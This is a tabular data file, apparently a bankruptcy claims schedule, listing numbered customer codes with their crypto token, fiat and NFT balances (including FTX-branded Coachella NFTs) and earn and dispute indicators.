| 07321120 | | TRX[12494.265316], USD[10.00] | | |
| 07321121 | | USD[0.01] | Yes | |
| 07321125 | | DOGE[1.61561889], ETH[.00000013], USD[0.00] | Yes | |
| 07321126 | | BTC[.02279843], DOGE[4189.69389002], USD[0.00] | | |
| 07321128 | | USD[10.00] | | |
| 07321131 | | DOGE[0], USD[0.00] | | |
| 07321135 | | BAT[4.31738747], BF_POINT[100], BRZ[6.5319715], CUSDT[19], DOGE[20.28213749], ETHW[.23954981], NFT (382897566018381763/GSW Western Conference Finals Commemorative Banner #1775)[1], NFT (384394623950146641/Saudi Arabia Ticket Stub #646)[1], NFT (390557127920603790/GSW Western Conference Finals Commemorative Banner #1776)[1], SHIB[6], SUSHI[.39615135], TRX[10], USD[0.00], USDT[0] | Yes | |
| 07321139 | | USD[10.00] | | |
| 07321141 | | CUSDT[1], DOGE[205.80613348], USD[11.04] | Yes | |
| 07321143 | | DOGE[1], USD[0.00] | | |
| 07321144 | | USD[10.00] | | |
| 07321149 | | CUSDT[1], TRX[4], USD[2.27] | Yes | |
| 07321151 | | BCH[0], BRZ[1], BTC[0], CUSDT[1], DAI[0], DOGE[0], ETH[0.00000001], GBP[0.00], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.00], USDT[0.00024570] | | |
| 07321152 | | BRZ[2], CUSDT[26], DOGE[6.04000392], GRT[683.17574108], SOL[52.83704755], TRX[1], USD[0.02], USDT[1.10362036] | Yes | |
| 07321156 | | NFT (376799849430528237/Coachella x FTX Weekend 1 #28037)[1] | | |
| 07321157 | | SOL[0], TRX[1], USD[0.00] | Yes | |
| 07321158 | | DOGE[0.04551417], USDT[0.00022850] | | |
| 07321160 | | BTC[.00020755], DOGE[1], USD[0.00] | Yes | |
| 07321161 | | BTC[.05128887], USD[0.01], USDT[0.00000001] | | |
| 07321162 | | DOGE[0], USD[0.00] | | |
| 07321167 | | USD[10.00] | | |
| 07321173 | | SHIB[1], SOL[.00001], USD[0.00] | | |
| 07321174 | | DOGE[524.067], USD[0.02] | | |
| 07321176 | | USD[10.00] | | |
| 07321178 | | BTC[0], DOGE[0], ETH[0], GRT[0] | | |
| 07321181 | | BTC[0], DOGE[0], ETH[0], SHIB[2018.59674214], USD[0.00] | | |
| 07321182 | | USD[10.00] | | |
| 07321183 | | BTC[.00025422], SUSHI[0], USD[0.00] | | |
| 07321184 | | DOGE[43.824], USD[0.04] | | |
| 07321186 | | BAT[0], BRZ[0], BTC[0], CUSDT[2], SUSHI[0], USD[0.00] | | |
| 07321188 | | DOGE[7.47600000], USD[0.37], USDT[0] | | |
| 07321189 | | BAT[6.64982158], BRZ[6.64982158], CUSDT[27], DOGE[0], GRT[1.00498957], TRX[7], USD[0.01], USDT[2.21660716] | Yes | |
| 07321191 | | USD[0.01] | | |
| 07321192 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07321193 | | DOGE[498.996], USD[0.03] | | |
| 07321194 | | CUSDT[1], ETH[0], SOL[0], USD[0.00] | | |
| 07321195 | | USD[10.00] | | |
| 07321196 | | BTC[0.00000005], DOGE[0], SOL[0], USD[112.90] | | |
| 07321199 | | USD[10.00] | | |
| 07321200 | | CUSDT[1], DOGE[178.6682319], TRX[1], USD[0.00] | | |
| 07321203 | | DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07321207 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07321208 | | BRZ[4], CUSDT[12], DOGE[788.03873537], LTC[3.06233692], TRX[7], USD[0.00] | | |
| 07321210 | | USD[50.00] | | |
| 07321213 | | BTC[0.00534176], DOGE[1130.25273555], ETH[0.00000001], ETHW[0], LTC[0], SHIB[19308432.15951922], SUSHI[.849631], USD[0.00] | | |
| 07321216 | | DOGE[1], USD[0.01] | | |
| 07321218 | | BTC[.00661915], CUSDT[3], DOGE[2586.76970725], TRX[1], USD[0.00] | Yes | |
| 07321219 | | USD[10.00] | | |
| 07321220 | | USD[10.00] | | |
| 07321221 | | TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321222 | | DOGE[.32478623], USD[0.01] | | |
| 07321223 | | USD[10.00] | | |
| 07321224 | | DOGE[7617.63252224], USD[0.00] | | |
| 07321225 | | CUSDT[2], GRT[2.03724981], TRX[2], USD[0.00], USDT[1.11061369] | Yes | |
| 07321230 | | DOGE[3.71759374], ETH[.00000128], ETHW[.00000128], USD[0.00] | | |
| 07321233 | | DOGE[1.00027942], USD[0.01] | | |
| 07321237 | | BRZ[1], CUSDT[2], DOGE[1], TRX[3], USD[0.01] | | |
| 07321239 | | BRZ[4.12428665], CAD[220.29], CUSDT[2], DOGE[2151.93984263], ETH[0.04639652], ETHW[0.04582196], EUR[151.38], MATIC[24.14654857], NFT (37264324360569675/Coachella x FTX Weekend 2 #2406)[1], SOL[.5323159], SUSHI[12.3069658], USD[0.00] | Yes | |
| 07321240 | | BAT[0], BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07321241 | | BTC[0], DOGE[0], ETH[0], MATIC[0], NFT (387616014262030484/1995)[1], NFT (570718439728860780/Cool Bean #4076)[1], PAXG[0], SHIB[839825.66942347], SOL[0.00106439], TRX[0], USD[2000.46], USDT[0] | Yes | |
| 07321244 | | BTC[.0000931], USD[33.63] | | |
| 07321245 | | CUSDT[2], DOGE[.00080265], ETH[0.00760919], ETHW[0.00751343], LINK[0.06319639], SOL[.41151506], USD[0.00] | Yes | |
| 07321246 | | CUSDT[1], EUR[8.33], SHIB[1], TRX[1], USD[0.01] | | |
| 07321247 | | ALGO[.07252369], BF_POINT[300], BRZ[1], CUSDT[1], LINK[.00251956], LTC[.00086485], NFT (416117327312963906/FTX - Off The Grid Miami #2354)[1], NFT (487862603578108275/Infinity #17)[1], SHIB[2], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07321248 | | BRZ[6], CUSDT[9], DOGE[1947.35095952], GRT[1], LINK[200.85789441], TRX[1], USD[0.00] | | |
| 07321251 | | DOGE[1183.10743276], USD[0.00] | | |
| 07321252 | | USD[0.00] | | |
| 07321253 | | BRZ[1], CUSDT[2], DOGE[164.3227664], TRX[1], UNI[.00000286], USD[1.40] | | |
| 07321255 | Contingent, Disputed | CUSDT[1], USD[0.01] | | |
| 07321256 | | USD[103.20] | Yes | |
| 07321257 | | BRZ[1], CUSDT[1], LTC[1.1177913], USD[0.00] | Yes | |
| 07321258 | | TRX[2], USD[0.01] | | |
| 07321261 | | CUSDT[7], DOGE[.01091327], ETH[.00000269], LINK[1.1098836], TRX[3], USD[0.00] | Yes | |
| 07321262 | | CUSDT[3], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07321263 | | CUSDT[1], DOGE[3097.92864986], TRX[3], USD[0.00] | | |
| 07321264 | | BTC[0], DOGE[0], USD[0.02] | | |
| 07321267 | | USD[10.00] | | |
| 07321269 | | USD[10.00] | | |
| 07321270 | | BTC[.0000916], DOGE[.469], GRT[.592], USD[0.00] | | |
| 07321272 | | USD[90.00] | | |
| 07321274 | | USD[10.00] | | |
| 07321275 | | USD[11.07] | Yes | |
| 07321279 | | USD[10.00] | | |
| 07321280 | | BRZ[1], BTC[0.03869246], CUSDT[1], DOGE[1], GRT[7919.47452189], LTC[.00000862], TRX[2], USD[0.00], USDT[1] | | |
| 07321282 | | BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07321284 | | USD[10.00] | | |
| 07321285 | | USD[2.00] | | |
| 07321286 | | DOGE[1.00001954], USD[0.00] | | |
| 07321287 | | USD[10.00] | | |
| 07321288 | | USD[10.00] | | |
| 07321289 | | USD[10.00] | | |
| 07321290 | | SHIB[5], USD[2.47] | Yes | |
| 07321291 | | BCH[0], BTC[0], DOGE[1], ETH[0], GRT[0], LTC[0], SOL[0.00001207], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07321294 | | BRZ[1], CUSDT[5], TRX[3], USD[0.00] | | |
| 07321296 | | USD[10.00] | | |
| 07321298 | | USD[10.00] | | |
| 07321299 | | USD[10.00] | | |
| 07321303 | | USD[10.00] | | |
| 07321306 | | CUSDT[1], DOGE[.88557674], TRX[1], USD[0.00] | | |
| 07321310 | | USD[10.00] | | |
| 07321312 | | CUSDT[1], USD[0.00] | | |
| 07321313 | | CUSDT[3], DOGE[0], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[0] | | |
| 07321314 | | DOGE[.95659009], USD[0.45], USDT[0] | | |
| 07321315 | | BRZ[2], CUSDT[1], ETH[.12647104], ETHW[.12534434], USD[0.06] | Yes | |
| 07321316 | | AVAX[.098575], BTC[0.03750778], ETH[0], ETHW[2.47155695], SOL[.00000001], TRX[122], USD[0.42] | | |
| 07321317 | | DOGE[.348] | | |
| 07321318 | | BRZ[1], CUSDT[3], DOGE[1], TRX[4], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321319 | | USD[0.00] | | |
| 07321320 | | BRZ[1], BTC[.00011625], CUSDT[3], DOGE[551.71257976], GRT[31.43905087], KSHIB[808.88688428], MATIC[11.10236442], SHIB[4], USD[0.00], USDT[9.94407343] | | |
| 07321321 | | BTC[.00018144], DOGE[.00022885], TRX[1], USD[0.00] | | |
| 07321323 | | BCH[.01830133], CUSDT[9], DOGE[1715.0012085], ETH[.00921039], ETHW[.00910095], GRT[49.71986205], LTC[.09810154], MATIC[5.15109528], SOL[1.10150573], SUSHI[13.9479321], TRX[47.50169784], UNI[1.10255797], USD[5.81] | Yes | |
| 07321324 | | CUSDT[2], DOGE[123.6203542], USD[0.00] | Yes | |
| 07321327 | | BRZ[2], BTC[.05171422], CUSDT[27.00064796], DOGE[1], ETHW[.84335309], MATIC[26.88016819], SHIB[4622549.94379587], TRX[9.0001577], USD[4425.62] | Yes | |
| 07321328 | Contingent, Disputed | USD[0.00] | | |
| 07321333 | | USD[0.01] | | |
| 07321335 | | CUSDT[5], SOL[.00000001], USD[0.00] | Yes | |
| 07321336 | | USD[10.00] | | |
| 07321338 | | DOGE[0.12211124], ETH[.000853], ETHW[.000853], USD[0.56], USDT[0.00000001] | | |
| 07321339 | | BRZ[2], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07321340 | | USD[10.00] | | |
| 07321343 | | GRT[10.89885503], USD[0.00] | Yes | |
| 07321345 | | BTC[0], DOGE[0] | | |
| 07321346 | | BTC[.00000013], USD[0.00], USDT[0] | | |
| 07321351 | | USD[30.00] | | |
| 07321352 | | BRZ[1], CUSDT[4], DOGE[5.13751868], SOL[1.4152052], SUSHI[.99803926], TRX[115.25250858], USD[5.12] | Yes | |
| 07321353 | | USD[10.00] | | |
| 07321354 | | USD[10.00] | | |
| 07321355 | | USD[10.00] | | |
| 07321356 | | BTC[.01985598], CUSDT[2], DOGE[1480.07534398], ETH[1.14059444], ETHW[1.14011544], GRT[1.00367791], TRX[1], USD[0.00] | Yes | |
| 07321358 | | DOGE[2599.66933116], ETH[0], SUSHI[26.3105], USD[0.25], USDT[1.31722919] | | |
| 07321361 | | CUSDT[2], DOGE[38.42969525], GRT[.089967], USD[0.06] | | |
| 07321362 | | USD[10.00] | | |
| 07321363 | | BAT[1], CUSDT[2], DOGE[5625.27194365], SUSHI[1.16939391], USD[0.00], USDT[2] | | |
| 07321364 | | DOGE[1437.96522781], LINK[.10605709], USD[0.00] | Yes | |
| 07321370 | | CUSDT[3], DOGE[4547.03839559], USD[0.00] | Yes | |
| 07321371 | | CUSDT[1.60520122], ETH[.00000001], USD[0.00], USDT[0] | Yes | |
| 07321372 | | USD[10.00] | | |
| 07321373 | | USD[10.00] | | |
| 07321374 | | USD[8.00] | | |
| 07321376 | | CUSDT[1], DOGE[120.68937103], USD[0.00] | Yes | |
| 07321378 | | BRZ[58.05487298], DOGE[9088.21897276], TRX[270.8690081], USD[0.00] | Yes | |
| 07321379 | | USD[10.00] | | |
| 07321380 | | DOGE[6787.74], USD[0.00] | | |
| 07321381 | | DOGE[10], USD[0.00] | | |
| 07321382 | | BRZ[2], CUSDT[2], SOL[0.00026817], USD[0.00], USDT[0] | Yes | |
| 07321385 | | USD[10.00] | | |
| 07321386 | | NFT (5462296813965554377/Coachella x FTX Weekend 2 #23693)[1] | | |
| 07321387 | | BRZ[2], ETHW[.0009462], GRT[1], TRX[1], USD[0.01] | | |
| 07321388 | | BTC[0], DOGE[0], ETH[0], LINK[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07321389 | | USD[10.00] | | |
| 07321390 | | DOGE[24.6276933], USD[0.00] | | |
| 07321391 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07321397 | | DOGE[.30566306], USD[0.00] | | |
| 07321399 | | USD[10.00] | | |
| 07321402 | | USD[10.00] | | |
| 07321404 | | BTC[0], SOL[0], USD[0.00] | | |
| 07321405 | | USD[20.00] | | |
| 07321406 | | USD[93.44] | | |
| 07321407 | | USD[10.00] | | |
| 07321408 | | BAT[1], CUSDT[5], DOGE[1], TRX[4], USD[0.00] | | |
| 07321411 | | BRZ[4], CUSDT[56.37349235], ETHW[.03346471], NFT (32982534757709633/5/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #13)[1], TRX[3], USD[2.12] | Yes | |
| 07321413 | | BRZ[1], DOGE[899.47252075], USD[0.00] | | |
| 07321415 | | USD[20.00] | | |
| 07321416 | | BTC[0], TRX[0], USD[0.00], USDT[0.00017676] | | |
| 07321419 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321424 | | BAT[0], DOGE[2], LINK[0], USD[0.00] | | |
| 07321425 | | USD[25.00] | | |
| 07321426 | | USD[10.00] | | |
| 07321429 | | USD[10.00] | | |
| 07321430 | | USD[10.00] | | |
| 07321432 | | ETH[0], SOL[0], SUSHI[0], UNI[0], USD[10.47], USDT[0] | | |
| 07321435 | | USD[0.00] | | |
| 07321436 | | BAT[1.01655549], BRZ[2], CUSDT[6], DOGE[3], TRX[6], USD[0.00], USDT[2.19349066] | Yes | |
| 07321437 | | USD[10.00] | | |
| 07321442 | | USD[10.00] | | |
| 07321443 | | AVAX[.00000001], BAT[.00004705], BRZ[.00013197], BTC[0], ETH[0], ETHW[0.00000366], SOL[0], SUSHI[.00002822], TRX[.00022559], USD[0.00], USDT[0.00000931] | | |
| 07321445 | | USD[10.00] | | |
| 07321449 | | CUSDT[2], EUR[0.00], SOL[.23637402], USD[0.00] | Yes | |
| 07321450 | | DOGE[776.223], USD[29.63] | | |
| 07321451 | | BTC[.00005669], DOGE[103.80512888], USD[0.00] | | |
| 07321452 | | USD[10.00] | | |
| 07321454 | | USD[10.00] | | |
| 07321455 | | CUSDT[2], DOGE[.36779635], TRX[2], USD[0.00] | | |
| 07321457 | | USD[0.13], USDT[0] | | |
| 07321459 | | DOGE[0], ETH[0.01591574], ETHW[0.01591574] | | |
| 07321463 | | USD[10.00] | | |
| 07321464 | | BTC[.0101], ETH[.09], ETHW[.09], LINK[10.60228189], SHIB[20988.68305425], SOL[2.02949313], USD[0.00], USDT[0] | | |
| 07321465 | | USD[0.03] | | |
| 07321467 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07321469 | | USD[10.00] | | |
| 07321471 | | BRZ[1], CUSDT[22], DOGE[1], ETHW[.02518159], SHIB[3], TRX[7], USD[0.01] | | |
| 07321472 | | BTC[0.00093201], DOGE[.996], GRT[2.07118171], TRX[1.992], USD[0.15] | | |
| 07321475 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07321476 | | USD[0.00] | | |
| 07321478 | | USD[10.00] | | |
| 07321482 | | USD[393.11] | | |
| 07321483 | | USD[10.00] | | |
| 07321484 | | USD[10.00] | | |
| 07321485 | | BTC[0.00158510], GRT[2.00070255], LTC[0], SHIB[1], SOL[4.03996508], TRX[2], USD[0.00], USDT[0.00000001] | Yes | |
| 07321487 | | ETH[0], USD[0.00] | Yes | |
| 07321488 | | USD[0.00] | | |
| 07321489 | | BRZ[1], CUSDT[1], DOGE[3], TRX[3], USD[0.00] | | |
| 07321490 | | DOGE[.5522], USD[0.45] | | |
| 07321491 | | BTC[0], ETHW[.00068773], USD[19736.34] | | |
| 07321492 | | CUSDT[3], DOGE[1220.49792284], SHIB[378754.11349411], SOL[.18926606], TRX[178.04857652], USD[0.00] | Yes | |
| 07321493 | | USD[10.00] | | |
| 07321496 | | CUSDT[2], DOGE[.0000381], SOL[.00006151], TRX[2], USD[0.01] | | |
| 07321497 | | BCH[.66822772], BTC[0.00001782], LTC[3.00834032], SOL[.00821], TRX[.000002], UNI[21.44042846], USD[0.54], USDT[0.41839700] | | |
| 07321498 | | CUSDT[1], DOGE[.07498913], USD[24.00] | | |
| 07321499 | | CUSDT[2], USD[0.00] | | |
| 07321500 | | USD[0.05] | | |
| 07321501 | | BRZ[15.57659572], DAI[.9932162], EUR[1.59], GBP[1.39], PAXG[.00051459], USD[0.96] | | |
| 07321502 | | DOGE[.206], USD[0.00], USDT[0] | | |
| 07321503 | | DOGE[147.852], USD[0.01] | | |
| 07321504 | | USD[10.00] | | |
| 07321506 | | BTC[0], USD[0.93] | | |
| 07321507 | | BCH[2.38454056], BRZ[3], CUSDT[11], DOGE[16410.45892411], LINK[7.82552952], NFT (457252257629744600/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #54)[1], NFT (483553279557680027/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #72)[1], NFT (507398623737679927/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #50)[1], NFT (510561497355994688/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #60)[1], NFT (527373000952603426/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #54)[1], NFT (538182859347081622/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #61)[1], SUSHI[7.04781845], TRX[13097.16070424], USD[4.24], USDT[3.30182332] | Yes | |
| 07321509 | | ETH[.00000001], ETHW[0], MATIC[.00000001], NFT (377583509799465996/Animal Series #3)[1], NFT (540159888167657273/Animal Series #2)[1], NFT (561278194421685615/Animal Series #4)[1], SHIB[1], USD[47.69], USDT[0] | Yes | |
| 07321510 | | CUSDT[1881.01158061], DOGE[.66274205], GRT[101.86861957], SHIB[22784653.9214233], TRX[78.49550341], USD[0.00], USDT[1] | | |
| 07321512 | | BRZ[2], CUSDT[33], DOGE[5952.31915192], SHIB[6916900.68952673], TRX[3], USD[150.00] | | |
| 07321514 | | AVAX[.062095], BTC[0.00007587], DOGE[0], ETH[.00072592], ETHW[.00072592], MATIC[30.92616413], NEAR[.005], SOL[0.10220204], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321515 | | USD[15.00] | | |
| 07321516 | | BRZ[0], BTC[0], DOGE[0], ETH[0], MATIC[0], NEAR[0], NFT (560389561649673578/CryptoAvatar #32)[1], SHIB[306147.49655207], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07321519 | | USD[10.00] | | |
| 07321521 | | USD[10.00] | | |
| 07321522 | | DOGE[664.564], GRT[197.693], USD[0.92] | | |
| 07321523 | | CUSDT[3], DOGE[47.06769421], TRX[1], USD[0.00] | | |
| 07321527 | | USD[10.00] | | |
| 07321528 | | TRX[182.92133047], USD[0.00] | | |
| 07321530 | | USD[10.00] | | |
| 07321531 | | CUSDT[1], DOGE[.00275767], TRX[1], USD[0.00] | Yes | |
| 07321532 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07321534 | | DOGE[1], USD[0.01] | | |
| 07321537 | | BF_POINT[300], BRZ[1], CUSDT[2], DOGE[1], ETH[0], GRT[2], SHIB[3], TRX[2384.12190761], USD[0.00], USDT[1.00001799] | | |
| 07321539 | | USD[10.00] | | |
| 07321540 | | ETH[.00000001], ETHW[0], TRX[90.43335674], USD[0.00] | | |
| 07321543 | | USD[10.00] | | |
| 07321544 | | USD[10.00] | | |
| 07321546 | | BRZ[27.75622969], BTC[0], CUSDT[1], DOGE[0.00004909], ETH[0], MATIC[5.49938214], TRX[42.81544061], USD[0.77] | | |
| 07321550 | | USD[10.00] | | |
| 07321551 | | BTC[0], USD[0.00] | | |
| 07321552 | | BRZ[2], CUSDT[4], TRX[1], USD[0.00] | | |
| 07321553 | | BTC[0], DOGE[9.52326494], ETH[0], USD[10.00] | | |
| 07321554 | | BAT[.59228916], BTC[.00058089], DOGE[41.87720671], ETH[.00662137], ETHW[.0026577], MATIC[.9878407], TRX[1], USD[9.45] | | |
| 07321560 | | DOGE[0.40659314], USD[0.00] | | |
| 07321564 | | USD[10.00] | | |
| 07321565 | | CUSDT[1], DOGE[4.40516476], TRX[1], USD[0.00] | | |
| 07321566 | | USD[10.00] | | |
| 07321568 | | USD[0.00] | | |
| 07321569 | | BTC[0.00000242], DOGE[21.1351997], USD[0.06] | | |
| 07321570 | | DOGE[.00003766], USD[9.38] | | |
| 07321571 | | USD[10.00] | | |
| 07321572 | | USD[0.00] | | |
| 07321573 | | SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07321575 | | USD[10.00] | | |
| 07321580 | | USD[10.00] | | |
| 07321581 | | USD[10.00] | | |
| 07321583 | | USD[10.74] | Yes | |
| 07321585 | | DOGE[0] | | |
| 07321586 | | BAT[1], BRZ[6], CUSDT[9], DOGE[1], GRT[2], TRX[9], USD[0.00], USDT[1] | | |
| 07321588 | | USD[10.00] | | |
| 07321591 | | CUSDT[3], DAI[0], DOGE[8], ETHW[.91292492], LTC[0], TRX[2], USD[0.00] | | |
| 07321593 | | BAT[1], BRZ[0.00118636], BTC[0.00000001], CUSDT[2], DOGE[14360.89690807], ETH[.00006246], ETHW[.00006246], GRT[1], TRX[3], USD[0.01], USDT[0.00032349] | | |
| 07321594 | | CUSDT[3], DOGE[1], TRX[2], USD[0.01] | | |
| 07321595 | | USD[0.00] | | |
| 07321596 | | BTC[.00006763], DAI[1.00013695], DOGE[17.93952778], MATIC[.62369061], USD[0.19] | Yes | |
| 07321597 | | USD[10.00] | | |
| 07321599 | | USD[0.90] | | |
| 07321600 | | USD[10.00] | | |
| 07321602 | | BTC[0], USD[0.00] | | |
| 07321603 | | USD[10.00] | | |
| 07321605 | | CUSDT[1], DOGE[60.37249818], SHIB[217055.08697874], USD[0.00] | Yes | |
| 07321608 | | BRZ[1], CUSDT[1], DOGE[120.61598897], USD[0.00] | | |
| 07321609 | | USD[39.26] | | |
| 07321610 | | USD[10.00] | | |
| 07321611 | | USD[10.00] | | |
| 07321613 | | USD[10.00] | | |
| 07321614 | | BRZ[1], DOGE[2906.8034414], USD[0.00] | | |
| 07321615 | | BAT[1], BCH[0], BRZ[3], BTC[0], CUSDT[2], GRT[0], TRX[3], USD[0.00], USDT[2], YFI[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321616 | | USD[10.00] | | |
| 07321617 | | TRX[136.4622117], USD[0.00] | | |
| 07321618 | | ETH[0], TRX[0], USD[0.00] | | |
| 07321619 | | BRZ[2], CUSDT[1], USD[3355.76] | | |
| 07321622 | | SUSHI[0], USD[0.01] | | |
| 07321623 | | BTC[.00005], USD[0.00] | | |
| 07321624 | | TRX[2.99693297], USD[0.00] | | |
| 07321625 | | BAT[1], BF_POINT[100], BRZ[2], CUSDT[1], DOGE[9.01586783], ETHW[.46378421], GRT[2], NEAR[123.78797312], SHIB[14], TRX[4], USD[0.00] | Yes | |
| 07321626 | | USD[10.00] | | |
| 07321629 | | BTC[0], DOGE[13359.46266103], GRT[3471.37923387], SUSHI[354.35504253], TRX[1], USD[10.00] | | |
| 07321630 | | BTC[.00000151], SOL[0], TRX[0], USD[10000.00] | Yes | |
| 07321631 | | BAT[1.0165555], BRZ[3], BTC[0], CUSDT[5], DOGE[0], GRT[2.08074684], NFT (29564182530569745/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #35)[1], NFT (547326918670747348/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #36)[1], SHIB[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07321632 | | USD[10.00] | | |
| 07321633 | | CUSDT[1], DOGE[20763.81454665], TRX[213.33753132], USD[0.00] | Yes | |
| 07321636 | | USD[0.00], USDT[0] | Yes | |
| 07321637 | | TRX[.000028], USD[2.17] | | |
| 07321638 | | USD[8.85] | | |
| 07321641 | | BTC[0], DOGE[0] | | |
| 07321642 | | BTC[.10391112], LINK[160.46936], SOL[.07088], SUSHI[200.54400731], UNI[54.5422], USD[1968.68], YFI[.000067] | | |
| 07321644 | | CUSDT[10], DOGE[423.21170000], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07321645 | | USD[10.00] | | |
| 07321646 | | DOGE[1], USD[0.00] | | |
| 07321648 | | BTC[.00026542], CUSDT[1], DOGE[1], USD[78.43] | Yes | |
| 07321650 | | BTC[.00002496] | | |
| 07321652 | | USD[10.00] | | |
| 07321653 | | USD[10.00] | | |
| 07321654 | | USD[10.00] | | |
| 07321655 | | USD[0.00] | | |
| 07321657 | | CUSDT[1], DOGE[53540.35143941], GRT[1], USD[100.00] | | |
| 07321659 | | USD[10.00] | | |
| 07321661 | | USD[10.00] | | |
| 07321664 | | USD[10.00] | | |
| 07321665 | | USD[0.00] | | |
| 07321666 | | CUSDT[1], DOGE[184.58045899], ETH[.00045011], ETHW[.00045011], USD[-2.87] | Yes | |
| 07321668 | | BTC[.00022461], DOGE[1.25021321], TRX[0], USD[0.00] | | |
| 07321671 | | BTC[0], CUSDT[2], DOGE[0.00000544], USD[0.00] | | |
| 07321673 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07321674 | | CUSDT[5], DOGE[1], TRX[2], USD[0.01] | | |
| 07321675 | | USD[10.00] | | |
| 07321676 | | SHIB[100000], USD[3.11] | | |
| 07321677 | | USD[0.01] | | |
| 07321682 | | CUSDT[3], DOGE[1], SHIB[5], TRX[2], USD[0.00] | | |
| 07321683 | | CUSDT[1], USD[0.01] | | |
| 07321685 | | DOGE[322], LINK[14.2], LTC[0], MATIC[.38768531], SUSHI[0], USD[0.30] | | |
| 07321687 | | BAT[52.57798086], DOGE[2.42146735], ETH[0], GRT[20.62739984], LTC[0], SOL[12.93466556], SUSHI[10.47307472], TRX[851.06981854], UNI[0], USD[0.00] | | |
| 07321688 | | USD[10.00] | | |
| 07321689 | | DOGE[.363], USD[0.00] | | |
| 07321691 | | DOGE[952.176], USD[0.30] | | |
| 07321692 | | CUSDT[2], DOGE[96.44038537], USD[0.62] | | |
| 07321694 | | DOGE[0], USD[0.90], USDT[0.99999999] | | |
| 07321695 | | CUSDT[3], DOGE[397.95189186], ETH[.00001824], ETHW[2.00497011], GRT[1.00367791], SHIB[1], TRX[.00688756], USD[0.01] | Yes | |
| 07321696 | | DOGE[53.84474051], USD[0.00] | Yes | |
| 07321698 | | USD[0.01] | | |
| 07321699 | | USD[10.00] | | |
| 07321700 | | USD[10.00] | | |
| 07321703 | | USD[10.00] | | |
| 07321705 | | USD[10.00] | | |
| 07321706 | | BTC[0], DOGE[0], ETH[0], LINK[0], SUSHI[0], TRX[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321708 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07321709 | | USD[10.00] | | |
| 07321710 | | BAT[1], BRZ[2], CUSDT[3], ETH[0], GRT[2], LINK[1], NFT (526030838183910137/Coachella x FTX Weekend 1 #24036)[1], SHIB[6], SOL[0], TRX[6], USD[10.01] | | |
| 07321712 | | BRZ[2], CUSDT[1], TRX[1], USD[0.00] | | |
| 07321713 | | DOGE[1], USD[0.00] | | |
| 07321714 | | USD[10.00] | | |
| 07321718 | | USD[0.01] | | |
| 07321720 | | BAT[1.0165555], BRZ[1], BTC[0], CUSDT[1], DAI[.00517126], DOGE[3.000548], SOL[0], TRX[1], USD[0.00], USDT[0.00000008] | Yes | |
| 07321722 | | BTC[0], USD[0.00] | | |
| 07321723 | | CUSDT[1], DOGE[715.21816447], SOL[3.74447306], TRX[1], USD[0.02], USDT[0] | Yes | |
| 07321724 | | BAT[41.974], BTC[.00439835], DOGE[4391.03900000], KSHIB[7.54], SHIB[65000], SOL[.00306], SUSHI[13.4875], USD[1.56] | | |
| 07321725 | | ALGO[226.00574841], CUSDT[2], SHIB[1], TRX[2], USD[0.00] | | |
| 07321727 | | CUSDT[2], DOGE[92.94755664], TRX[1], USD[0.41] | | |
| 07321728 | | USD[10.00] | | |
| 07321729 | | USD[10.00] | | |
| 07321730 | | USD[10.00] | | |
| 07321732 | | BTC[.00034455], CUSDT[2], DOGE[739.51498642], USD[0.00] | | |
| 07321734 | | BTC[.0185], ETH[0.64546909], ETHW[0.64546909], SOL[86.60758462], USD[0.00], USDT[0] | | |
